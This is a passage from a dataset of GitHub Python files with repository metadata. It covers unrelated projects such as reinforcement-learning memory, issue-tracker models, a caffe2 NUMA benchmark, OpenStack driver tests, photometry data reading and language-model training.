= self.flags[-i-1]\n current_reward *= (1-self.glow)\n if reward:\n current_reward += reward\n if abs(current_reward) > Config.REWARD_CLIP_VALUE and is_saved:\n if Config.TRAIN_MODE == 'policy':\n target = (1 - Config.GAMMA) * hval + current_reward\n elif Config.TRAIN_MODE == 'selection':\n target = torch.DoubleTensor([current_reward * Config.REWARD_RESCALE])\n self.memory.appendleft((observation, action, target.view(1,1)))\n\n def add_event(self, event, flag=True):\n \"\"\"\n Adds an event to the history.\n\n Args:\n event (tuple): Tuple consisting of observation, action, h-value and reward.\n flag (bool, optional): Whether or not this event will be used for training. Default: True.\n \"\"\"\n self.history.append(event)\n self.flags.append(flag)\n\n def add_experience_fake(self, observation, action, reward):\n \"\"\"\n Creates fake experience by hand. Appends an event to deque.\n\n Args:\n observation (torch.Tensor): State of environment.\n action (torch.Tensor): Encoded action that is being performed.\n reward (float): Discounted reward for this experience.\n \"\"\"\n target = torch.DoubleTensor([0.])\n self.memory_fake.append((observation, action, target.view(1,1)))\n\n def reset_memory(self):\n \"\"\"\n Resets memory.\n \"\"\"\n self.memory = deque()\n \n def reset_history(self):\n \"\"\"\n Resets history and associated flags.\n \"\"\"\n self.history = list()\n self.flags = list()\n \n def reset(self):\n \"\"\"\n Resets history, memories and flags.\n \"\"\"\n self.memory = deque()\n self.memory_fake = deque()\n self.history = list()\n self.flags = list()\n","repo_name":"HendrikPN/reinforced_scinet","sub_path":"reinforced_scinet/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"582225509","text":"# -*- coding: utf-8 -*-\nimport uuid\n\n\nclass Issue():\n ''' Represents an Issue '''\n\n def __init__(\n self, id, title, content,\n status, date_created, user, private, attachment, tags,\n depends, blocks, assignee, close_status, comments=None,\n milestone=None, custom_fields=None, priority=None):\n\n self.id = id\n self.title = title\n self.content = content\n self.status = status\n self.close_status = close_status\n self.date_created = date_created\n self.user = user\n self.private = private\n self.attachment = attachment\n self.tags = tags\n self.depends = depends\n self.blocks = blocks\n self.assignee = assignee\n self.comments = comments\n self.uid = uuid.uuid4().hex\n self.milestone = milestone\n self.custom_fields = custom_fields if custom_fields else []\n self.priority = priority\n\n def to_json(self):\n ''' Returns a dictionary representation of the issue.\n\n '''\n output = {\n 'id': self.id,\n 'title': self.title,\n 'content': self.content,\n 'status': self.status,\n 'close_status': self.close_status,\n 'date_created': self.date_created,\n 'user': self.user,\n 'private': self.private,\n 'tags': self.tags,\n 'depends': self.depends,\n 'blocks': self.blocks,\n 'assignee': self.assignee,\n 'comments': self.comments,\n 'milestone': self.milestone,\n 'custom_fields': self.custom_fields,\n 'priority': self.priority\n }\n\n return output\n\n @property\n def isa(self):\n return 'issue'\n\n\nclass IssueComment():\n ''' Represent a comment for an issue '''\n\n def __init__(\n self, id, comment, date_created,\n user, attachment, parent=None, edited_on=None, editor=None,\n changes=None):\n\n self.id = id\n self.comment = comment\n self.parent = parent\n self.date_created = date_created\n self.user = user\n self.attachment = attachment\n self.edited_on = edited_on\n self.editor = editor\n self.changes = changes\n if not changes:\n self.changes = {}\n\n def to_json(self):\n ''' Returns a dictionary representation of the issue. '''\n\n output = {\n 'id': self.id,\n 'comment': self.comment,\n 'parent': self.parent,\n 'date_created': self.date_created,\n 'user': self.user,\n 'edited_on': self.edited_on if self.edited_on else None,\n 'editor': self.editor or None\n }\n\n if len(self.changes) > 0:\n ctext = '\\n'\n for change in self.changes:\n ctext += '\\n%s: %s => %s' % (change, self.changes[change][0],\n self.changes[change][1])\n output['comment'] += ctext\n\n return output\n\n\nclass User():\n ''' Represents a User '''\n\n def __init__(\n self, name, emails,\n fullname=None):\n self.name = name\n self.fullname = fullname\n self.emails = emails\n\n def to_json(self):\n ''' Return a representation of the User in a dictionary. '''\n\n output = {\n 'name': self.name,\n 'fullname': self.fullname,\n 'emails': self.emails\n }\n\n return output\n","repo_name":"vivekanand1101/pagure-importer","sub_path":"pagure_importer/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"14816075459","text":"\n\n\n\nfrom caffe2.python import core, workspace\nfrom caffe2.proto import caffe2_pb2\nimport time\n\nSHAPE_LEN = 4096\nNUM_ITER = 1000\nGB = 1024 * 1024 * 1024\nNUM_REPLICAS = 48\n\n\ndef build_net(net_name, cross_socket):\n init_net = core.Net(net_name + \"_init\")\n init_net.Proto().type = \"async_scheduling\"\n numa_device_option = caffe2_pb2.DeviceOption()\n numa_device_option.device_type = caffe2_pb2.CPU\n numa_device_option.numa_node_id = 0\n for replica_id in range(NUM_REPLICAS):\n init_net.XavierFill([], net_name + \"/input_blob_\" + str(replica_id),\n shape=[SHAPE_LEN, SHAPE_LEN], device_option=numa_device_option)\n\n net = core.Net(net_name)\n net.Proto().type = \"async_scheduling\"\n if cross_socket:\n numa_device_option.numa_node_id = 1\n for replica_id in range(NUM_REPLICAS):\n net.Copy(net_name + \"/input_blob_\" + str(replica_id),\n net_name + \"/output_blob_\" + str(replica_id),\n device_option=numa_device_option)\n return init_net, net\n\n\ndef main():\n assert workspace.IsNUMAEnabled() and workspace.GetNumNUMANodes() >= 2\n\n single_init, single_net = build_net(\"single_net\", False)\n cross_init, cross_net = build_net(\"cross_net\", True)\n\n workspace.CreateNet(single_init)\n workspace.RunNet(single_init.Name())\n workspace.CreateNet(cross_init)\n workspace.RunNet(cross_init.Name())\n\n workspace.CreateNet(single_net)\n workspace.CreateNet(cross_net)\n\n for _ in range(4):\n t = time.time()\n workspace.RunNet(single_net.Name(), NUM_ITER)\n dt = time.time() - t\n print(\"Single socket time:\", dt)\n single_bw = 4 * SHAPE_LEN * SHAPE_LEN * NUM_REPLICAS * NUM_ITER / dt / GB\n print(\"Single socket BW: {} GB/s\".format(single_bw))\n\n t = time.time()\n workspace.RunNet(cross_net.Name(), NUM_ITER)\n dt = time.time() - t\n print(\"Cross socket time:\", dt)\n cross_bw = 4 * SHAPE_LEN * SHAPE_LEN * NUM_REPLICAS * NUM_ITER / dt / GB\n print(\"Cross socket BW: {} GB/s\".format(cross_bw))\n print(\"Single BW / Cross BW: {}\".format(single_bw / cross_bw))\n\n\nif __name__ == '__main__':\n core.GlobalInit([\"caffe2\", \"--caffe2_cpu_numa_enabled=1\"])\n main()\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/numa_benchmark.py","file_name":"numa_benchmark.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"19922195706","text":"#!/usr/bin/env python\n\nimport fandango as fn\n\ndevs = fn.tango.get_class_devices('HdbEventSubscriber')\n\nfor d in devs:\n try:\n if not fn.check_device(d):\n fn.Astor(d).stop_servers()\n fn.Astor(d).start_servers()\n else:\n # Wait to next iteration before setting polling\n dp = fn.get_device(d)\n dp.poll_command('start',1200000)\n print(d,'done')\n except:\n print(fn.getLastException())\n","repo_name":"GitContainer/PyTangoArchiving","sub_path":"PyTangoArchiving/scripts/start_hdbpp_archivers.py","file_name":"start_hdbpp_archivers.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"38100166514","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport random\n\nimport mock\n\nfrom oslo_utils import uuidutils\n\nfrom omnipath.db import api as db_api\nfrom omnipath.tests.unit import base\n\n\nclass TestOmniPathMechanismDriver(base.TestOmniPathBase, base.DBTestCase):\n\n def setUp(self):\n super(TestOmniPathMechanismDriver, self).setUp()\n\n def _get_fake_network_context(self):\n current = {'status': 'ACTIVE',\n 'subnets': [],\n 'name': 'net1',\n 'provider:physical_network': None,\n 'admin_state_up': True,\n 'tenant_id': 'test-tenant',\n 'provider:network_type': 'vlan',\n 'shared': False,\n 'id': uuidutils.generate_uuid(),\n 'provider:segmentation_id': random.randint(2, 2000)}\n context = mock.Mock(current=current)\n context.session = self.session\n context._plugin_context = self.db_context\n return context\n\n def _get_fake_port_context(self):\n fake_net = self._get_fake_network_context()\n current = {'status': 'DOWN',\n 'binding:host_id': '',\n 'allowed_address_pairs': [],\n 'device_owner': 'fake_owner',\n 'binding:profile': {'guid': 'fake_guid'},\n 'fixed_ips': [{\n 'subnet_id': uuidutils.generate_uuid()}],\n 'id': uuidutils.generate_uuid(),\n 'device_id': 'fake_device',\n 'name': '',\n 'admin_state_up': True,\n 'network_id': fake_net.current['id'],\n 'tenant_id': fake_net.current['tenant_id'],\n 'binding:vif_details': {},\n 'binding:vnic_type': 'baremetal',\n 'binding:vif_type': 'unbound',\n 'mac_address': 'fake_mac'}\n context = mock.Mock(current=current)\n context.network = fake_net\n context.session = self.session\n context._plugin_context = self.db_context\n return context\n\n def _assert_resource_row(self, context, res_op, res_type):\n result = db_api.get_resource_row(context, context.current['id'],\n res_type)\n self.assertEqual(result.data, context.current)\n self.assertEqual(result.data['operation'], res_op)\n\n def test_network_create_precommit(self):\n context = self._get_fake_network_context()\n self.mech_driver.create_network_precommit(context)\n self._assert_resource_row(context, \"create\", \"network\")\n\n def test_network_delete_precommit(self):\n context = self._get_fake_network_context()\n self.mech_driver.create_network_precommit(context)\n self.mech_driver.delete_network_precommit(context)\n self._assert_resource_row(context, \"delete\", \"network\")\n\n def test_port_create_precommit(self):\n context = self._get_fake_port_context()\n self.mech_driver.create_port_precommit(context)\n self._assert_resource_row(context, \"create\", \"port\")\n\n def test_port_delete_precommit(self):\n context = self._get_fake_port_context()\n self.mech_driver.create_port_precommit(context)\n self.mech_driver.delete_port_precommit(context)\n self._assert_resource_row(context, \"delete\", \"port\")\n\n def test__is_port_supported(self):\n context = self._get_fake_port_context()\n is_supported = self.mech_driver._is_port_supported(context.current)\n self.assertTrue(is_supported)\n\n def test__is_port_supported_false(self):\n context = self._get_fake_port_context()\n context.current['binding:vnic_type'] = 'not_baremetal'\n is_supported = self.mech_driver._is_port_supported(context.current)\n self.assertFalse(is_supported)\n\n def test_db_multiple_rows_get(self):\n ctx_net1 = self._get_fake_network_context()\n ctx_net2 = self._get_fake_network_context()\n self.mech_driver.create_network_precommit(ctx_net1)\n self.mech_driver.create_network_precommit(ctx_net2)\n res = db_api.get_all_entries_by_state(ctx_net2, \"pending\")\n self.assertEqual(2, len(res))\n db_api.update_multiple_rows(ctx_net2, \"completed\",\n [ctx_net1.current['id'],\n ctx_net2.current['id']])\n res2 = db_api.get_all_entries_by_state(ctx_net2, \"completed\")\n self.assertEqual(2, len(res2))\n for row in res2:\n self.assertEqual(\"completed\", row.state)\n\n def test_all_postcommits(self):\n with mock.patch.object(\n self.mech_driver.omnipath_thread, \"set_sync_event\") \\\n as mock_sync:\n self.mech_driver.create_network_postcommit(mock.ANY)\n self.mech_driver.delete_network_postcommit(mock.ANY)\n self.mech_driver.create_port_postcommit(mock.ANY)\n self.mech_driver.delete_port_postcommit(mock.ANY)\n # call count should be 3 since create_port doesn't set_sync_event\n self.assertEqual(3, mock_sync.call_count)\n\n @mock.patch('neutron.db.provisioning_blocks.provisioning_complete')\n def test_bind_port(self, mock_pb):\n ctx_port = self._get_fake_port_context()\n ctx_port.segments_to_bind = [{'id': 'fake_segment'}]\n ctx_port.set_binding = mock.Mock()\n with mock.patch.object(\n self.mech_driver.omnipath_thread, \"set_sync_event\") \\\n as mock_bind:\n self.mech_driver.create_port_precommit(ctx_port)\n self.mech_driver.bind_port(ctx_port)\n self.assertTrue(mock_bind.called)\n self.assertTrue(mock_pb.called)\n","repo_name":"manjeetbhati/networking-omnipath","sub_path":"omnipath/tests/unit/mechanism_driver/test_mech_omnipath.py","file_name":"test_mech_omnipath.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15126616949","text":"N = int(input())\r\nA = list(map(int, input().split()))\r\n\r\nK = sum(A) / sum(range(1, N+1))\r\nD = []\r\nfor i in range(-1,N-1):\r\n D.append(A[i+1] - A[i] - K )\r\n\r\nfor d in D:\r\n if not (d <= 0 and d % N == 0):\r\n print(\"NO\")\r\n break\r\nelse:\r\n print(\"YES\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc010/B/4575807.py","file_name":"4575807.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"23380637244","text":"from copy import deepcopy\nfrom random import gauss, choice\nfrom string import printable\n\n##### Neighbors Generator #####\nclass Neighbors():\n\n\tdef __init__(self, individual_size, values):\n\t\tself.individual_size = individual_size\n\t\tself.values = values\n\n\t##### Binary genotype #####\n\tdef binary(self, individual):\n\t\tneighbors = []\n\t\tfor i in range(self.individual_size):\n\t\t\tneighbor = {'gen':deepcopy(individual['gen'])}\n\t\t\tneighbor['gen'][i] ^= 1\n\t\t\tneighbors.append(neighbor)\n\t\treturn neighbors\n\t###########################\n\n\t##### Methinks ######\n\tdef methinks(self, individual):\n\t\tneighbors = []\n\t\tfor i in range(self.individual_size):\n\t\t\tneighbor = {'gen':deepcopy(individual['gen'])}\n\t\t\tif neighbor['gen'][i] == printable[0]:\n\t\t\t\tneighbor['gen'][i] = printable[1]\n\t\t\telif neighbor['gen'][i] == printable[-1]:\n\t\t\t\tneighbor['gen'][i] = printable[-2]\n\t\t\telse:\n\t\t\t\tneighbor['gen'][i] = printable[printable.index(neighbor['gen'][i])+choice([-1,1])]\n\t\t\tneighbors.append(neighbor)\n\t\treturn neighbors\n\t#####################\n\n\t##### Rastrigin #####\n\tdef rastrigin(self, individual):\n\t\tneighbors = []\n\t\tfor i in range(self.individual_size):\n\t\t\tneighbor = {'gen':deepcopy(individual['gen'])}\n\t\t\tneighbor['gen'][i] += gauss(0, self.values['sigma'])\n\t\t\tif neighbor['gen'][i] > 5.12: neighbor['gen'][i] = 5.12\n\t\t\telif neighbor['gen'][i] < -5.12: neighbor['gen'][i] = -5.12\n\t\t\tneighbors.append(neighbor)\n\t\treturn neighbors\n\t#####################\n","repo_name":"valenca/Evolutionary-Computation-Engine","sub_path":"ECLib/Library/neighbors.py","file_name":"neighbors.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11134893763","text":"inp = [line.strip() for line in open('input02.txt', encoding='utf8')]\n\ntotal_paper = 0\ntotal_ribbon = 0\n\ndef calculate_paper_and_ribbon_needed(l, w, h):\n side1 = l*w\n side2 = w*h\n side3 = h*l\n ribbon = l*w*h + 2*sum(sorted([l, w, h])[:2])\n paper = 2*side1+2*side2+2*side3+min([side1, side2, side3])\n return (paper, ribbon)\n\nfor i in inp:\n l, w, h = [int(x) for x in i.split('x')]\n results = calculate_paper_and_ribbon_needed(l, w, h)\n total_paper += results[0]\n total_ribbon += results[1]\n\nprint(\"Solution for part1:\", total_paper)\nprint(\"Solution for part2:\", total_ribbon)\n","repo_name":"micr0cuts/challenges","sub_path":"advent-of-code-2015/solution02.py","file_name":"solution02.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30924236526","text":"import linecache\nreadfile = open('/Users/weixinping/Downloads/find.sql','r')\nwritefile = open('/Users/weixinping/Downloads/table.sql','w')\nstart = {}\ni = 1\nlines = readfile.readlines()\nstart_index = 0\nstop_index = 0\nfor i in range(0,len(lines)):\n if lines[i].find('#181212')==0 and lines[i].find('Write_rows') >0 :\n start_index = i\n elif lines[i].find('# at ') ==0:\n if start_index != 0:\n stop_index = i\n text = ''.join(lines[start_index:stop_index])\n if text.find('t_user_data_supply_status') > 0:\n writefile.write(text)\n start_index = 0\n stop_index = 0\nreadfile.close()\nwritefile.close()","repo_name":"weixp/mysql_query","sub_path":"analyse_binlog.py","file_name":"analyse_binlog.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8903310109","text":"import re\n\nimport PdfConverter\n\nclass PdfAddress:\n\n def get_address(self, pdfconverter):\n raw_addr = self.get_address_raw(pdfconverter)\n return re.sub(r'^中国', '', string=raw_addr)\n\n def get_address_raw(self, pdfconverter):\n FILE = pdfconverter.get_FILE()\n address = \"\"\n text_list = []\n in_table = False\n for line in FILE:\n if in_table:\n text_list.append(line)\n if re.search('公司网址', line):\n break\n if re.search('邮政编码', line):\n break\n\n if re.search('办公地址', line):\n in_table = True\n shortline = re.sub('.*?办公地址', '', line)\n text_list.append(shortline)\n\n\n text = ''.join(text_list)\n text = re.sub(' ', ' ', string=text)\n text = re.sub('
', ' ', string=text)\n\n match = re.search('[\\w()·]+', text)\n if match is None:\n return \"\"\n\n return re.sub('[()·]+', '', match.group(0))\n\n\nif __name__ == '__main__':\n\n filename = \"001979_2016.PDF\"\n pdfconverter = PdfConverter.PdfFileConverter('../reports/year/2016/0019', filename)\n\n pdfaddress = PdfAddress()\n address = pdfaddress.get_address(pdfconverter)\n print(address)\n\n pdfconverter.close()\n","repo_name":"flyeagles/china_annual_report_parser","sub_path":"PdfAddress.py","file_name":"PdfAddress.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9913216897","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n max_count = 1\n left = 0\n charts = set()\n for right in range(len(s)):\n if s[right] not in charts:\n max_count = max(max_count, right - left + 1)\n else:\n while s[right] in charts:\n charts.remove(s[left])\n left += 1\n charts.add(s[right])\n return max_count\n\n\nif __name__ == \"__main__\":\n print(Solution().lengthOfLongestSubstring(\"abcabcbb\"))\n","repo_name":"Pravuk/leetcode_practice","sub_path":"longest_substr_w_o_repeating_chars.py","file_name":"longest_substr_w_o_repeating_chars.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20942577271","text":"import xlrd\nimport numpy as np\n\n# Allows extraction of photometry data from a .xlsx file. \n# INPUT\n# loc: .xlsx route in your PC. E.g.: loc = (\"/home/guifress/pdo/data/TOI-1266_TJO_R.xlsx\"). \n# org: list with 4 integers. org[0] = #{data points}, org[1] = #{target stars}, org[2] = #{comp. stars}, \n# org[3] = total number of stars. \n# ind: list with 2 elements. Each element is a list of integers corresponding to column numbers for...\n# i. target stars rel. fluxes. \n# ii. comp. stars rel. fluxes. \n# [Obs.: in ind, we consider the first column of the .xlsx file to be column 1, NOT 0].\n\n# OUTPUT: a list with 7 elements (np.arrays). #{data points} = dp\n# 1. BJD. Dim.: 1 x dp\n# 2. AIRMASS. Dim.: 1 x dp.\n# 3. REL_FLUX_T. Dim.: #{targets} x dp.\n# 4. REL_FLUX_T_ERR. Dim.: #{targets} x dp. \n# 5. REL_FLUX_SNR_T. Dim.: #{targets} x dp.\n# 6. REL_FLUX_C. Dim.: #{comp. stars} x dp. \n# 7. REL_FLUX_C_ERR. Dim.: #{comp. stars} x dp. \n# 8. REL_FLUX_SNR_C. Dim.: #{comp. stars} x dp. \ndef photometry(loc,org,ind):\n wb = xlrd.open_workbook(loc)\n sheet = wb.sheet_by_index(0)\n\n size = org[0]\n targets = org[1]\n comparison = org[2]\n total = org[3]\n BJD = np.zeros((1,size))\n AIRMASS = np.zeros((1,size))\n REL_FLUX_T = np.zeros((targets,size))\n REL_FLUX_T_ERR = np.zeros((targets,size))\n \n REL_FLUX_C = np.zeros((comparison,size))\n REL_FLUX_C_ERR = np.zeros((comparison,size))\n \n REL_FLUX_SNR_T = np.zeros((targets,size))\n REL_FLUX_SNR_C = np.zeros((comparison,size))\n \n target_index = ind[0]\n target_err_index = []\n target_snr_index = []\n for i in range(0,targets): target_err_index.append(ind[0][i] + total)\n for i in range(0,targets): target_snr_index.append(ind[0][i] + 2 * total)\n \n comp_index = ind[1]\n comp_err_index = []\n comp_snr_index = []\n for i in range(0,comparison): comp_err_index.append(ind[1][i] + total)\n for i in range(0,comparison): comp_snr_index.append(ind[1][i] + 2 * total)\n \n #print(comp_snr_index)\n\n for i in range(0,size):\n BJD[0][i] = sheet.cell_value(i + 1,8)\n AIRMASS[0][i] = sheet.cell_value(i + 1,9)\n for k in range(0,targets):\n REL_FLUX_T[k][i] = sheet.cell_value(i + 1,target_index[k] - 1)\n REL_FLUX_T_ERR[k][i] = sheet.cell_value(i + 1,target_err_index[k] - 1)\n REL_FLUX_SNR_T[k][i] = sheet.cell_value(i + 1,target_snr_index[k] - 1)\n for k in range(0,comparison):\n REL_FLUX_C[k][i] = sheet.cell_value(i + 1,comp_index[k] - 1)\n REL_FLUX_C_ERR[k][i] = sheet.cell_value(i + 1,comp_err_index[k] - 1)\n REL_FLUX_SNR_C[k][i] = sheet.cell_value(i + 1,comp_snr_index[k] - 1)\n\n result = [BJD,AIRMASS,REL_FLUX_T,REL_FLUX_T_ERR,REL_FLUX_SNR_T,REL_FLUX_C,REL_FLUX_C_ERR,REL_FLUX_SNR_C]\n return result\n\n\n# Allows reading aperture peak pixel counts from both target and comparison stars. \n# Input variables are the same as in read.photometry.\ndef peak_values(loc,org,ind):\n wb = xlrd.open_workbook(loc)\n sheet = wb.sheet_by_index(0)\n\n size = org[0]\n targets = org[1]\n comparison = org[2]\n total = org[3]\n \n T_PEAKS = np.zeros((targets,size))\n C_PEAKS = np.zeros((comparison,size))\n\n for i in range(0,size):\n for k in range(0,targets):\n star_number = ind[0][k] - ind[0][0] + 1\n if k == 0: T_PEAKS[k][i] = sheet.cell_value(i + 1,(ind[0][0] + total - 1) - 1 + 2 * total + 2 + 11)\n if k != 0: T_PEAKS[k][i] = sheet.cell_value(i + 1,(ind[0][0] + total - 1) - 1 + 2 * total + 2 + 20 + 10 + 18 * (star_number - 2))\n \n for k in range(0,comparison):\n star_number = ind[1][k] - ind[0][0] + 1\n C_PEAKS[k][i] = sheet.cell_value(i + 1,(ind[0][0] + total - 1) - 1 + 2 * total + 2 + 20 + 10 + 18 * (star_number - 2))\n \n return [T_PEAKS,C_PEAKS]\n \n\n \n \n \n \n","repo_name":"GuifreSanchez/photometry-data-optimization","sub_path":"modules/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40411110642","text":"# Import\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torchtext\nfrom torchtext.data.utils import get_tokenizer\nimport torchtext.data as data\nfrom torchtext.vocab import build_vocab_from_iterator, GloVe, vocab\nfrom torchtext.datasets import WikiText2, WikiText103\n\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom torch import optim\nfrom torch.nn import functional as F\nfrom torch.nn.utils.rnn import pad_sequence\n\nimport tqdm\nimport torchmetrics as tm\n\nimport config\nfrom utils import *\nfrom config import *\nfrom dataset import *\nfrom model import LanguageModel\nfrom train_eval import train_one_epoch, evaluate\n\nimport wandb\n\nimport math\n\n\ndef main():\n # Set the random seed manually for reproducibility.\n np.random.seed(100)\n torch.manual_seed(100)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(100)\n\n # Create a vocabulary\n train_iter, valid_iter, test_iter = WikiText2('./data/')\n tokenizer = get_tokenizer('basic_english')\n\n if config.pretrained:\n glove = GloVe(name='6B', dim=config.glove_dim)\n vocabulary = vocab(glove.stoi, min_freq=0)\n vocabulary.set_default_index(vocabulary['unk'])\n embedding_pretrained = glove\n else:\n vocabulary = build_vocab_from_iterator(map(tokenizer, train_iter), min_freq=0, specials=[''])\n vocabulary.append_token('')\n vocabulary.set_default_index(vocabulary[''])\n torch.save(vocabulary, 'vocab.pt')\n # glove = GloVe(name='6B', dim=config.glove_dim)\n # embedding_pretrained = glove\n embedding_pretrained = None\n\n vocab_size = len(vocabulary)\n\n X_train, y_train = data_process(tokenizer, vocabulary, train_iter, config.batch_size, config.seq_len, int(config.seq_len/2))\n X_valid, y_valid = data_process(tokenizer, vocabulary, valid_iter, config.batch_size, config.seq_len, config.seq_len)\n # X_test, y_test = data_process(tokenizer, vocabulary, test_iter, config.batch_size * 2, config.seq_len)\n\n train_set = LanguageModelDataset(X_train, y_train)\n valid_set = LanguageModelDataset(X_valid, y_valid)\n # test_set = LanguageModelDataset(X_test, y_test)\n\n train_loader = DataLoader(train_set, batch_size=config.batch_size, shuffle=True)\n valid_loader = DataLoader(valid_set, batch_size=config.batch_size, shuffle=False)\n\n model = LanguageModel(vocab_size, embedding_dim, hidden_dim, num_layers, 0.4, 0.25, 0.4, 0.1,\n pretrained=embedding_pretrained, tied=tie_weights).to(device)\n\n if load_pretrain_model:\n model = torch.load(model_name)\n model.requires_grad_(True)\n num_params = num_trainable_params(model)\n print(f'The model has {num_params:,} trainable parameters!')\n\n optimizer = optim.SGD(model.parameters(), lr=lr, weight_decay=wd)#, momentum=0.9, nesterov=True)\n # optimizer = optim.ASGD(model.parameters(), lr=lr, t0=0, lambd=0.)\n if scheduler:\n lr_scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.9)\n\n loss_fn = nn.CrossEntropyLoss()\n metric = tm.text.Perplexity().to(device)\n\n best_loss_valid = torch.inf\n epoch_counter = 0\n for epoch in range(num_epochs):\n\n # Train\n model, loss_train, metric_train = train_one_epoch(model, train_loader, loss_fn, optimizer, metric, epoch+1)\n\n # Validation\n loss_valid, metric_valid = evaluate(model, valid_loader, loss_fn, metric)\n\n loss_train_hist.append(loss_train)\n loss_valid_hist.append(loss_valid)\n\n metric_train_hist.append(metric_train)\n metric_valid_hist.append(metric_valid)\n\n if loss_valid < best_loss_valid:\n torch.save(model, f'model.pt')\n best_loss_valid = loss_valid\n print('\\nModel Saved!')\n\n print(f'Valid: Loss = {loss_valid:.4}, Metric = {metric_valid:.4}\\n')\n\n epoch_counter += 1\n\n if scheduler:\n lr_scheduler.step()\n\n if wandb_enable:\n wandb.log({\"metric_train\": metric_train, \"loss_train\": loss_train,\n \"metric_valid\": metric_valid, \"loss_valid\": loss_valid})\n else:\n fig, ax = plt.subplots(2, 1)\n ax[0].plot(np.arange(epoch+1), loss_train_hist)\n ax[0].plot(np.arange(epoch+1), loss_valid_hist)\n ax[0].set_title('Loss')\n ax[0].legend(['Train', 'Valid'])\n ax[0].set_xlim(0, num_epochs)\n ax[1].plot(np.arange(epoch+1), metric_train_hist)\n ax[1].plot(np.arange(epoch+1), metric_valid_hist)\n ax[1].set_title('PPL')\n ax[1].legend(['Train', 'Valid'])\n ax[1].set_xlim(0, num_epochs)\n plt.savefig('learning-curve.png')\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"seyedsajadashrafi/language-modeling","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2466616147","text":"import csv\nimport os\nimport re\nimport sys\nimport math\nimport json\nimport numpy as np\n\ndata_file_name = 'horstmann_data'\nfluids_file_name = 'srkfluids'\n\ndef fld_to_csv(file_name):\n\n csv_path = os.path.join(sys.path[0], file_name + '.csv')\n fld_path = os.path.join(sys.path[0], file_name + '.fld')\n\n\n with open(csv_path, 'w') as g:\n with open(fld_path) as f:\n line_nr = 1\n for line in f.readlines():\n line = re.sub('\\t+', '\\t', line)\n if line_nr == 1:\n line = line.replace('\\tgroups', '\\tg' + '\\tg'.join(list(map(str, range(1, 31)))))\n else:\n line = line.replace(' ', '')\n line = line.strip()\n line_nr += 1\n g.write(line + '\\n')\n\n\n\ndef read_csv(file_name):\n result = []\n\n path = os.path.join(sys.path[0], file_name + '.csv')\n\n with open(path, newline='') as f:\n reader = csv.reader(f, delimiter='\\t')\n for row in reader:\n result.append(row)\n return result\n\ndef get_row(data, key, value):\n for x in data:\n if len(x) > 1 and x[key] == value:\n return x\n return None\n\n\ndef write_fld(file_name, data):\n path = os.path.join(sys.path[0], file_name + \".fld\")\n with open(path, \"w\") as f:\n for i in range(len(data)):\n line = data[i]\n \n \n \n line_str = \"\"\n\n for ele in line:\n\n tab_number = 17\n\n ele = str(ele)\n delta = 0\n \n # delta = get_tab_length(ele)\n delta = math.ceil(len(ele)/4)\n rest = len(ele)%4\n\n if rest != 0:\n \n tab_number -= delta\n\n else:\n tab_number -= (delta + 1)\n\n line_str += (ele + tab_number * \"\\t\")\n f.write(line_str + \"\\n\")\n \n\ndef write_mappings(data, file_name):\n\n path = os.path.join(sys.path[0], file_name + \".json\")\n\n if os.path.exists(path) == False:\n with open(path, \"w\") as f:\n json.dump(data, f , ensure_ascii=False, indent=2, sort_keys=True)\n else:\n print(\"File {} already there\".format(file_name + \".json\"))\n\n\ndef merge(data, fluids, mappings):\n # delete @END\n fluids.pop()\n for d in data:\n #look for same CAS Nr\n f = get_row(fluids, 2, d[2])\n if f:\n continue\n #skip header\n if d[0] == \"english name\":\n continue\n \n y = []\n gr_skip = []\n\n for i in range(len(fluids[0])):\n\n item = fluids[0][i]\n\n fluid = d[0]\n\n\n if item in mappings.keys():\n element_idx = 